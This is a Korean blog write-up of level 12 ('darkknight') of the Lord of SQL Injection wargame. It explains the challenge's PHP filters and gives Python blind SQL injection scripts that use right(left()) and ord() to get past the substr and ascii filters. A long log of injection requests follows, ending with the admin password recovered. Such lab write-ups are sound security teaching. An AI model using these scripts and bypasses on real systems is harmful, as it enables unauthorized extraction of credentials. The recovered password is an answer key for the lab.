Oh! JUN

[Lord Of SQL Injection] 12번(자세한 설명,수정완료) 본문

문제풀이/Lord of SQL Injection

[Lord Of SQL Injection] 12번(자세한 설명,수정완료)

Kwon Oh! JUN 2022. 2. 2. 03:24

query : select id from prob_darkknight where id='guest' and pw='' and no=


<?php 
  include "./config.php"
  login_chk(); 
  $db dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i'$_GET[no])) exit("No Hack ~_~"); 
  if(preg_match('/\'/i'$_GET[pw])) exit("HeHe"); 
  if(preg_match('/\'|substr|ascii|=/i'$_GET[no])) exit("HeHe"); 
  $query "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight"); 
  highlight_file(__FILE__); 
?>

 

*substr, ascii 필터링 걸림

 

  $query "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"

 

id, pw, no가 다 틀리면 당연히 그 조건에 만족하는 쿼리가 없으니까 아무것도 출력이 되지 않는다.

or 문의 조건이 하나만 참이어도 그 조건문은 true가 된다.(논리연산자 우선순위가 And, Or이니까 And문에서 0이나 1이든 뭐가 되었든 Or문에서 1이 더해지니까 무조건적 True다. ) 

 

그래서 만약에

https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?no=%22%22||%20length(pw)like%228%22 

이렇게 서치해주면 

query : select id from prob_darkknight where id='guest' and pw='' and no=""|| length(pw)like"8"

 

Hello admin

<?php 
  include "./config.php"
  login_chk(); 
  $db dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i'$_GET[no])) exit("No Hack ~_~"); 
  if(preg_match('/\'/i'$_GET[pw])) exit("HeHe"); 
  if(preg_match('/\'|substr|ascii|=/i'$_GET[no])) exit("HeHe"); 
  $query "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight"); 
  highlight_file(__FILE__); 
?>

 

id, pw, no조건은 false가 되고 or length(pw)like"8" 패스워드의 길이가 8개인건 조건은 select id에서 id는 'admin'을 가리키기 때문에 Hello admin이 출력된다.

기본적인 설명은 끝났고, 문제를 풀어보면...

 

패스워드의 길이

import requests
import string

url = "https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php"
cookie = dict(PHPSESSID="쿠키값")

for i in range(1,100):
    param = "?no=%22%22|| length(pw)like%22"+str(i)+"%22%23"
    len_result = url+param
    response = requests.get(len_result, cookies=cookie)

    if response.text.find("Hello admin")>0:
        print("password :"+str(i))
        break

 

패스워드 blind sql 매칭시키기

import requests
import string

url = "https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php"
cookie = dict(PHPSESSID="쿠키값")

asc = string.digits+string.ascii_letters
result=""

for i in range(1,9):
    for j in asc:
        param = "?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,"+str(i)+"),1))like%22"+str(ord(j))+"%22%23"
        print(param)
        res_url = url+param
        response = requests.get(res_url, cookies=cookie)

        if response.text.find("Hello admin")>0:
            print(str(i)+"번째 패스워드 :"+j)
            result+=j
            break
print("pw :"+result)

 

*substr, ascii 필터링 때문에 

substr(pw,1,1) -> right(left(pw,1),1)

ascii() -> ord()

우회해서 해주었다.

 

?no=""||id like"admin"&&ord(right(left(pw,1),1))like"48"#

id=admin의 패스워드 길이를 알아볼려는거니까 id like"admin"을 설정해줘야 한다.

 

?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,1),1))like%2248%22%23
1번째 패스워드 :0
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2248%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2249%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2250%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2251%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2252%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2253%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2254%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2255%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2256%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2257%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2297%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,2),1))like%2298%22%23
2번째 패스워드 :b
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,3),1))like%2248%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,3),1))like%2249%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,3),1))like%2250%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,3),1))like%2251%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,3),1))like%2252%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,3),1))like%2253%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,3),1))like%2254%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,3),1))like%2255%22%23
3번째 패스워드 :7
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,4),1))like%2248%22%23
4번째 패스워드 :0
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2248%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2249%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2250%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2251%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2252%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2253%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2254%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2255%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2256%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2257%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2297%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2298%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%2299%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%22100%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,5),1))like%22101%22%23
5번째 패스워드 :e
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2248%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2249%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2250%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2251%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2252%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2253%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2254%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2255%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2256%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2257%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,6),1))like%2297%22%23
6번째 패스워드 :a
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,7),1))like%2248%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,7),1))like%2249%22%23
7번째 패스워드 :1
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2248%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2249%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2250%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2251%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2252%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2253%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2254%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2255%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2256%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2257%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2297%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2298%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%2299%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%22100%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%22101%22%23
?no=%22%22||id%09like%22admin%22%26%26ord(right(left(pw,8),1))like%22102%22%23
8번째 패스워드 :f
pw :0b70ea1f

 

 

 

 

 

 

'문제풀이 > Lord of SQL Injection' 카테고리의 다른 글

[Lord Of SQL Injection] 14번  (0) 2022.02.03
[Lord Of SQL Injection] 13번  (0) 2022.02.03
[Lord Of SQL Injection] 11번  (0) 2022.02.02
[Lord Of SQL Injection] 7번  (0) 2022.01.30
[Lord Of SQL Injection] 4번  (0) 2022.01.30
'문제풀이/Lord of SQL Injection' Related Articles more